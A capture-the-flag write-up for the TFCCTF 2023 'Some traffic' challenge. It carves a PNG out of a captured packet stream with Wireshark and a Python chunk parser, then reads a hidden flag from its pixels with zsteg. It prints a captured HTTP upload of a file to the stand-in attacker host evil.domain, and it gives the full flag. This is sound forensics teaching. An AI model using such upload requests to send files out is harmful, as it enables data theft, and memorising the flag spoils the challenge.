TFCCTF 2023 – Some Traffic

Author: Lumy

Some traffic (50 points, 88 solves)

Our SOC analysts said that in the last few days, some of our employees started to upload a lot of photos on random sites. Check it out

Table of Contents

  1. A network capture
  2. Solution

A network capture

The challenge gives us a network capture: sus.pcapng

Let's open it in Wireshark and analyse the packets.

Solution

Using Follow TCP Stream or Follow HTTP Stream, we can easily see that a PNG file is sent to a server:

POST /upload HTTP/1.1
Host: evil.domain
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------81822315710418281242033858480
Content-Length: 91761
Origin: http://evil.domain
Connection: keep-alive
Referer: http://evil.domain/
Upgrade-Insecure-Requests: 1

-----------------------------81822315710418281242033858480
Content-Disposition: form-data; name="flag"; filename="output_modified.png"
Content-Type: image/png

.PNG
.
...
IHDR.............O.+K....IDATx......J.....t...5.\.n.D4.MAk.....}U.-	..&BB4.=$.
&..dU...^..Te9+..........H....1b..j...FS...j5R'm....Z....FZH..O....A]F._.V.?.hp+.$b....:....c.@}VR+.........$i)..c........i#.:......V:J..$.c?A.@.......L.$.l

Using en.wikipedia.org/wiki/List_of_file_signatures, we know that a PNG file starts with 89 50 4E 47 0D 0A 1A 0A.

Let's switch the stream view to "Raw" ("Brut" in the French Wireshark UI):


We have to take the bytes from 89504E470D0A1A0A up to the IEND chunk, which marks the end of the PNG. We can also just take all the data from the start of the PNG signature onwards; whatever follows IEND (here, the closing multipart boundary) is ignored by image viewers.
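The carve described above, as an added example that is not part of the original writeup: it locates the PNG signature in a byte blob, walks the chunk structure (verifying each chunk CRC) until IEND, and returns the image plus whatever trailed it. The multipart body is constructed inline to mimic the capture; the boundary string is taken from the request above.

```python
import struct
import zlib

PNG_SIG = bytes.fromhex("89504E470D0A1A0A")  # 89 50 4E 47 0D 0A 1A 0A


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Build one PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def carve_png(blob: bytes) -> tuple:
    """Return (png, trailing): png spans the signature through the IEND chunk,
    trailing is everything after it (e.g. the closing multipart boundary that
    zsteg reports as extra data after IEND)."""
    start = blob.find(PNG_SIG)
    if start < 0:
        raise ValueError("no PNG signature in data")
    pos = start + len(PNG_SIG)
    while True:
        if pos + 8 > len(blob):
            raise ValueError("truncated PNG: no IEND chunk found")
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc_stored = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc_stored) < 4:
            raise ValueError("truncated chunk %r" % ctype)
        if struct.unpack(">I", crc_stored)[0] != (zlib.crc32(ctype + data) & 0xFFFFFFFF):
            raise ValueError("bad CRC on chunk %r" % ctype)
        pos += 12 + length
        if ctype == b"IEND":
            return blob[start:pos], blob[pos:]


def build_sample_body() -> bytes:
    """Constructed multipart body: part headers, a 1x1 RGB PNG, closing boundary."""
    # Firefox-style boundary: "--" plus the 27-dash value from the Content-Type header
    boundary = b"--" + b"-" * 27 + b"81822315710418281242033858480"
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, colour type 2 (RGB)
    idat = zlib.compress(b"\x00" + b"\x10\x20\x30")     # filter byte 0 + one RGB pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    return (boundary + b"\r\n"
            b'Content-Disposition: form-data; name="flag"; filename="output_modified.png"\r\n'
            b"Content-Type: image/png\r\n\r\n" + png + b"\r\n" + boundary + b"--\r\n")
```

Run against the body from the Raw view, the trailing part is the 64-byte closing boundary that zsteg flags below.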

We can then go to tomeko.net/online_tools/hex_to_file.php?lang=en to convert the hex data into a PNG file.

Finally, running zsteg on the retrieved image, we can recover the flag (the b8,g,lsb,yx line reads the full green channel, column by column):

root@73f9a80770cf:/data# zsteg -a image.png
[?] 64 bytes of extra data after image end (IEND), offset = 0x1658d
extradata:0         .. text: "\r\n-----------------------------81822315710418281242033858480--\r\n"
b1,r,msb,xy         .. file: 0421 Alliant compact executable
b1,b,msb,xy         .. file: 0421 Alliant compact executable
b1,bgr,lsb,xy       .. <wbStego size=2720, data="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"..., even=false, enc="wbStego 2.x/3.x", controlbyte="\xA0">
b2,rgb,lsb,xy       .. file: FoxPro FPT, blocks size 25600, next free block index 1677721700, field type 0
b2,rgb,msb,xy       .. file: FoxPro FPT, blocks size 9728, next free block index 637534246, field type 0
b3,rgb,msb,xy       .. file: Curses screen image
b4,r,lsb,xy         .. file: dBase III DBT, version number 0, next free block index 1048592
b4,r,msb,xy         .. file: dBase III DBT, version number 0, next free block index 524296
b4,g,msb,xy         .. file: dBase III DBT, version number 0, next free block index 393222
b4,rgb,lsb,xy       .. file: FoxPro FPT, blocks size 5648, next free block index 370147328, field type 0
b4,rgb,msb,xy       .. file: FoxPro FPT, blocks size 26632, next free block index 1745354752, field type 0
b5,g,lsb,xy         .. file: Targa image data - Mono 2152 x 65536 x 0 "" Targa image data - Mono 2152 x 65536 x 0 ""
b2,rgb,lsb,yx       .. text: "]eVQUTYu"
b8,g,lsb,yx         .. text: "FCCTF{H1dd3n_d4t4_1n_p1x3ls_i5n't_f4n_4nd_e4sy_to_f1nd!}TFCCTF{H1dd3n_d4t4_1n_p1x3ls_i5n't_f4n_4nd_e4sy_to_f1nd!}TFCCTF{H1dd3n_d4t4_1n_p1x3ls_i5n't_f4n_4nd_e4sy_to_f1nd!}TFCCTF{H1dd3n_d4t4_1n_p1x3ls_i5n't_f4n_4nd_e4sy_to_f1nd!}TFCCTF{H1dd3n_d4t4_1n_p1x3ls_"
b2,r,lsb,yx,prime   .. file: VISX image file
b2,r,msb,yx,prime   .. file: 5View capture file
b2,b,lsb,yx,prime   .. file: VISX image file
b2,b,msb,yx,prime   .. file: 5View capture file
b2,rgb,lsb,yx,prime .. text: "]EW]uTYE"
b8,g,lsb,yx,prime   .. text: "CT{1nd_nx5'__4tdCF3441stds_fnTd_xl4_4_dCd3_1sidnTC{ndx54_4_d}d1sit_n{1n_l'__t}C3_1tfdsfC{1nx'44tdd3ifsfTC1_x5'_4t_F44_stf_fT1_l44_}C34_it_Tndxl5'_}CFd1sitnT1_l54_}Cd41idsfn{1dxl4_4Fd34_sfd_ndx'_tdF4_stfdn"
b3,rgb,msb,xY       .. file: unknown demand paged pure executable
b4,rgb,lsb,xY       .. file: FoxPro FPT, blocks size 5136, next free block index 336592896, field type 0
b4,rgb,msb,xY       .. file: FoxPro FPT, blocks size 10248, next free block index 671612928, field type 0
b5,rgb,lsb,xY       .. file: dBase III DBT, version number 0, next free block index 525
b7,g,msb,xY         .. file: dBase III DBT, version number 0, next free block index 1342177301
b8,g,msb,xY         .. file: dBase III DBT, version number 0, next free block index 42
b2,rgb,lsb,Yx       .. text: "]ET]eWQE"
b7,g,msb,Yx         .. file: PGP\011Secret Key -
b8,g,lsb,Yx         .. text: "T}!dn1f_ot_ys4e_dn4_n4f_t'n5i_sl3x1p_n1_4t4d_n3dd1H{FTCCFT}!dn1f_ot_ys4e_dn4_n4f_t'n5i_sl3x1p_n1_4t4d_n3dd1H{FTCCFT}!dn1f_ot_ys4e_dn4_n4f_t'n5i_sl3x1p_n1_4t4d_n3dd1H{FTCCFT}!dn1f_ot_ys4e_dn4_n4f_t'n5i_sl3x1p_n1_4t4d_n3dd1H{FTCCFT}!dn1f_ot_ys4e_dn4_n4f_t'n5"
b2,r,lsb,Yx,prime   .. file: VISX image file
b2,r,msb,Yx,prime   .. file: 5View capture file
b2,rgb,lsb,Yx,prime .. text: "YeTYeUUE"
b8,g,lsb,Yx,prime   .. text: "!d1_y4n___lntddT!n_edfn34_3HFF4n_'pnd1T!o_nfni4FF}1y4__ptd1TCofni33F1_yn'lntdC!_nf314_H}1_y_lpddTo_i1_HF}_n__lndd1nednn313HF_n'pd1C!_dni33Fy4_'_ltC!nofni3FF_n'_ptC!oefi4_HF1_4_'pndno_enn143y4_ltdTndnn314F"
b8,g,msb,Yx,prime   .. text: "6.&*v&vv"